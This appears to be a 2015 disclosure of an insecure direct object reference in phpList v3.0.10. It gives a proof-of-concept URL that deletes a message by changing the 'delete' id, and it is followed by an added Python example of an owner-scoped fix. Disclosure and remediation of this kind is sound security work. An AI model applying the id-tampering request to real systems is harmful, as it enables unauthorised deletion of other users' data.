Aerosol
Posted April 2, 2015

# Affected software: phplist
# Type of vulnerability: insecure object reference
# URL: phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# version: phpList ltd. - v3.0.10
# Proof of concept

insecure object referenced on page deletion
vuln param: delete
example: http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99
ref: https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29
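An added example (not from the original post and not phpList's own code) of the server-side check that closes an insecure direct object reference on a `delete` parameter, modelled in Python with an in-memory SQLite table. The `message` table, its `owner` column, the session fields, the status-code contract and the reading of `tk` as a per-session anti-CSRF token are all assumptions made for illustration.

```python
import hmac
import sqlite3


def make_db():
    """Constructed sample data: two admins (10 and 20), one campaign each."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE message (id INTEGER PRIMARY KEY, owner INTEGER, subject TEXT)"
    )
    db.executemany(
        "INSERT INTO message VALUES (?, ?, ?)",
        [(1, 10, "alice draft"), (2, 20, "bob draft")],
    )
    return db


def delete_unsafe(db, params):
    """Before: the client-supplied id is trusted, so any caller can delete any row."""
    cur = db.execute("DELETE FROM message WHERE id = ?", (int(params["delete"]),))
    return cur.rowcount == 1


def delete_checked(db, session, params):
    """After: token check plus an ownership-scoped DELETE (hypothetical handler).

    Returns an HTTP-style status code.
    """
    # A valid token only proves the request came from the caller's own session;
    # it says nothing about whether the caller may touch this object.
    if not hmac.compare_digest(params.get("tk", "").encode(), session["tk"].encode()):
        return 403
    try:
        msg_id = int(params["delete"])
    except (KeyError, ValueError):
        return 400
    # Authorization lives in the query: the row goes only if it belongs to the caller.
    cur = db.execute(
        "DELETE FROM message WHERE id = ? AND owner = ?",
        (msg_id, session["admin_id"]),
    )
    # "Not yours" and "does not exist" get the same answer, so ids cannot be probed.
    return 200 if cur.rowcount == 1 else 404
```

Scoping the `DELETE` by owner in the statement itself avoids a separate lookup-then-delete step that could be skipped or raced.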